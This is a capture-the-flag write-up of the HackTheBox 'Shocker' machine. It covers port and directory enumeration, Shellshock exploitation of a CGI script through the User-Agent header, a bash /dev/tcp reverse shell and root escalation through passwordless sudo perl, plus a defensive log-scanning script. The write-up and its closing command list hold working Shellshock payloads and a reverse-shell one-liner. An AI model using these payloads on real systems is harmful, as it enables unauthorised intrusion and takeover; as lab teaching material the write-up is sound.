⚠️ Disclaimer: the techniques, ideas and tools in this article are provided solely for security-oriented learning and exchange; if you do not agree, please close this page! Nobody may use them for illegal purposes or for profit; anyone who does so bears the consequences themselves.
🎯 Define the target
🔍 Port scan
```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ sudo nmap -sS -p- 10.10.10.56 --max-retries=0 -Pn -oN allports.txt -oX allports.xml
```

```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ cat allports.txt
# Nmap 7.92 scan initiated Sat Apr  2 12:26:46 2022 as: nmap -sS -p- --max-retries=0 -Pn -oN allports.txt -oX allports.xml 10.10.10.56
Warning: 10.10.10.56 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.56 (10.10.10.56)
Host is up (0.29s latency).
Not shown: 53365 closed tcp ports (reset), 12168 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1
# Nmap done at Sat Apr  2 12:28:15 2022 -- 1 IP address (1 host up) scanned in 89.20 seconds
```

```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ nmap -sV -sC -p $(cat allports.txt | grep ^[0-9] | cut -d / -f1 | tr '\n' ',' | sed s/,$//) 10.10.10.56 -oN nmap.txt -oX nmap.xml
```

```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ cat nmap.txt
# Nmap 7.92 scan initiated Sat Apr  2 12:34:56 2022 as: nmap -sV -sC -p 80,2222 -oN nmap.txt -oX nmap.xml 10.10.10.56
Nmap scan report for 10.10.10.56 (10.10.10.56)
Host is up (0.35s latency).
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr  2 12:35:27 2022 -- 1 IP address (1 host up) scanned in 30.36 seconds
```
🔍 Vulnerability discovery
Visit the website.
There is nothing usable in the page itself.
Enumerate directories.
There is a catch here.
```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ gobuster dir -u http://10.10.10.56 -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/02 12:41:49 Starting gobuster in directory enumeration mode
===============================================================
Progress: 672 / 81644 (0.82%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/04/02 12:42:13 Finished
===============================================================
```
Pause for a moment: there is a detail here worth noting ⚠️
Look at the traffic through the burpsuite proxy.
Requests to port 8081 on the local machine are then redirected to 10.10.10.56:80.
Rerun the command above and see what is actually being sent.
```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ gobuster dir -u http://127.0.0.1:8081 -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1:8081
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/02 12:49:02 Starting gobuster in directory enumeration mode
===============================================================
Progress: 29 / 81644 (0.04%)
```
As you can see, the URLs being requested have no trailing `/`. Because `/cgi-bin/` and `/icons/` are aliases rather than real directories under the web root, a request for `/cgi-bin` without the slash simply gets a 404 instead of a redirect, which is why the first run found nothing. The official documentation shows this can be fixed by adding the `--add-slash` option:

```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ gobuster dir -u http://10.10.10.56 -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt --add-slash
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2022/04/02 12:53:40 Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/             (Status: 403) [Size: 294]
/icons/               (Status: 403) [Size: 292]
```
The directory `/cgi-bin/` exists. Continue enumerating, this time for files inside it:

```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ gobuster dir -u http://10.10.10.56/cgi-bin/ -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php,txt,pl,html,sh
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              pl,html,sh,php,txt
[+] Timeout:                 10s
===============================================================
2022/04/02 12:55:56 Starting gobuster in directory enumeration mode
===============================================================
/user.sh              (Status: 200) [Size: 119]
```
A file `user.sh` is found; view its contents:

```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script
 01:00:47 up 38 min,  0 users,  load average: 0.02, 0.02, 0.00
```
Request it a few more times and the time keeps updating, so the script is really being executed on each request.
Combined with the name of the box, this points to one vulnerability: https://github.com/mubix/shellshocker-pocs
The response body here contains a `Content-Type` line, so the guess is that the HTTP request headers are involved.
🔍 Vulnerability verification
First start a packet capture, so we can see whether the command actually executes:

```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ sudo tcpdump -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
```

Then run the test command:

```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ curl http://10.10.10.56/cgi-bin/user.sh -H "User-Agent: '(){ :;}; ping 10.10.14.2'"
```

Traffic shows up in the capture:
```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ sudo tcpdump -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
13:17:33.233469 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [S], seq 3022979098, win 64240, options [mss 1460,sackOK,TS val 418792827 ecr 0,nop,wscale 10], length 0
13:17:33.519710 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [S.], seq 3759996546, ack 3022979099, win 28960, options [mss 1285,sackOK,TS val 796251 ecr 418792827,nop,wscale 6], length 0
13:17:33.519822 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 1, win 63, options [nop,nop,TS val 418793113 ecr 796251], length 0
13:17:33.519986 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [P.], seq 1:106, ack 1, win 63, options [nop,nop,TS val 418793114 ecr 796251], length 105: HTTP: GET /cgi-bin/user.sh HTTP/1.1
13:17:33.807707 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [.], ack 106, win 453, options [nop,nop,TS val 796323 ecr 418793114], length 0
13:17:33.807756 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [.], ack 106, win 453, options [nop,nop,TS val 796323 ecr 418793114], length 0
13:17:33.812419 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [P.], seq 1:173, ack 106, win 453, options [nop,nop,TS val 796324 ecr 418793114], length 172: HTTP: HTTP/1.1 200 OK
13:17:33.812452 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 173, win 63, options [nop,nop,TS val 418793406 ecr 796324], length 0
13:17:33.812490 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [P.], seq 179:212, ack 106, win 453, options [nop,nop,TS val 796324 ecr 418793114], length 33: HTTP
13:17:33.812499 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 173, win 63, options [nop,nop,TS val 418793406 ecr 796324,nop,nop,sack 1 {179:212}], length 0
13:17:33.812508 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [P.], seq 173:179, ack 106, win 453, options [nop,nop,TS val 796324 ecr 418793114], length 6: HTTP
13:17:33.812517 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 212, win 63, options [nop,nop,TS val 418793406 ecr 796324], length 0
13:17:33.812526 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [P.], seq 212:218, ack 106, win 453, options [nop,nop,TS val 796324 ecr 418793114], length 6: HTTP
13:17:33.812533 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 218, win 63, options [nop,nop,TS val 418793406 ecr 796324], length 0
13:17:33.813745 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [P.], seq 287:299, ack 106, win 453, options [nop,nop,TS val 796324 ecr 418793114], length 12: HTTP
13:17:33.813755 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 218, win 63, options [nop,nop,TS val 418793407 ecr 796324,nop,nop,sack 1 {287:299}], length 0
13:17:34.171126 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [P.], seq 218:287, ack 106, win 453, options [nop,nop,TS val 796414 ecr 418793407], length 69: HTTP
13:17:34.171203 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 299, win 63, options [nop,nop,TS val 418793765 ecr 796414], length 0
13:17:34.171523 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [F.], seq 106, ack 299, win 63, options [nop,nop,TS val 418793765 ecr 796414], length 0
13:17:34.979170 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [F.], seq 106, ack 299, win 63, options [nop,nop,TS val 418794573 ecr 796414], length 0
13:17:35.273744 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [.], ack 107, win 453, options [nop,nop,TS val 796687 ecr 418794573,nop,nop,sack 1 {106:107}], length 0
13:17:35.950617 IP 10.10.10.56.http > 10.10.14.2.52114: Flags [F.], seq 299, ack 107, win 453, options [nop,nop,TS val 796859 ecr 418794573], length 0
13:17:35.950649 IP 10.10.14.2.52114 > 10.10.10.56.http: Flags [.], ack 300, win 63, options [nop,nop,TS val 418795544 ecr 796859], length 0
```

Verification successful.
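Why a header such as User-Agent ends up in bash at all, and what these requests look like from the server side: an added Python example (not from the original write-up or the box) that maps HTTP header names to the CGI environment variables Apache exports and scans Apache combined-format access-log lines for the function-definition pattern used above. The log lines are constructed for the example; the probe string on the second line is the one from this page.

```python
# Added example, not part of the original write-up: Shellshock-style request
# detection over Apache combined-format access log lines.
import re

# Bash before the fix parsed any environment variable whose value began with
# "() {" as an exported function and kept executing what followed the closing
# brace. Apache's CGI handler exports request headers to the script's
# environment as HTTP_<NAME>, which is how a User-Agent value reaches bash.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;")

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def header_to_cgi_env(name: str) -> str:
    """CGI environment variable name that Apache sets for an HTTP header."""
    return "HTTP_" + name.upper().replace("-", "_")

def scan_line(line: str):
    """Return a finding dict if any attacker-controlled field carries the pattern."""
    m = LOG_RE.match(line)
    if m is None:
        return None  # not a combined-format line; ignore it
    f = m.groupdict()
    fields = [k for k in ("req", "referer", "ua") if SHELLSHOCK_RE.search(f[k])]
    if not fields:
        return None
    path = f["req"].split(" ")[1] if " " in f["req"] else f["req"]
    return {"ip": f["ip"], "ts": f["ts"], "fields": fields,   # which log fields matched
            "cgi_target": path.startswith("/cgi-bin/")}      # aimed at a CGI path?

def scan_log(lines):
    return [hit for hit in map(scan_line, lines) if hit is not None]

# Constructed sample lines; the User-Agent on line 2 is the probe from the write-up.
SAMPLE_LOG = """\
10.10.14.2 - - [02/Apr/2022:13:05:10 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "-" "curl/7.81.0"
10.10.14.2 - - [02/Apr/2022:13:17:33 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 172 "-" "'(){ :;}; ping 10.10.14.2'"
10.10.14.2 - - [02/Apr/2022:13:20:01 +0000] "GET /index.html HTTP/1.1" 200 137 "() { :;}; id" "Mozilla/5.0"
10.10.14.2 - - [02/Apr/2022:13:21:45 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "-" "Mozilla/5.0 (X11; Linux x86_64)"
""".splitlines()

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The Referer line shows that the pattern is worth checking in every header Apache exports, not only User-Agent, since each one becomes an HTTP_* variable in the CGI environment.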
💥 Exploitation
Start a local listener:

```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
```

Run the attack command:

```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ curl http://10.10.10.56/cgi-bin/user.sh -H 'User-Agent: () { :;}; /bin/bash -c "bash -i >& /dev/tcp/10.10.14.2/1234 0>&1"'
```

Check the result:

```
┌──(liona㉿kali)-[~/Workspace/HTB/Shocker]
└─$ nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.56.
Ncat: Connection from 10.10.10.56:44186.
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ ls
ls
user.sh
shelly@Shocker:/usr/lib/cgi-bin$
```

Shell obtained.
Look for commands that can be run with root privileges.
First check whether `sudo` can be run at all:

```
shelly@Shocker:/home/shelly$ sudo
sudo
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ...
```

List the commands `sudo` allows:

```
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
```

`perl` can be run as root without a password, so `perl` can be used to launch a root shell. Run the command:

```
shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
sudo perl -e 'exec "/bin/sh";'
ls
user.txt
cd /root
ls
root.txt
```
Summary
Knowledge points
- Shellshock vulnerability
- quick and simple bash reverse shell
- troubleshooting directory enumeration
Commands

```
nmap -sS -p- [IP] --max-retries=0 -Pn -oN allports.txt -oX allports.xml
nmap -sV -sC -p $(cat allports.txt | grep ^[0-9] | cut -d / -f1 | tr '\n' ',' | sed s/,$//) [IP] -Pn -oN nmap.txt -oX nmap.xml
gobuster dir -u URL -w WORDLIST --add-slash
gobuster dir -u URL -w WORDLIST -x [FILE EXTENSION]
() { :;}; [COMMAND]
/bin/bash -c "bash -i &> /dev/tcp/[IP]/[PORT] 0>&1"
```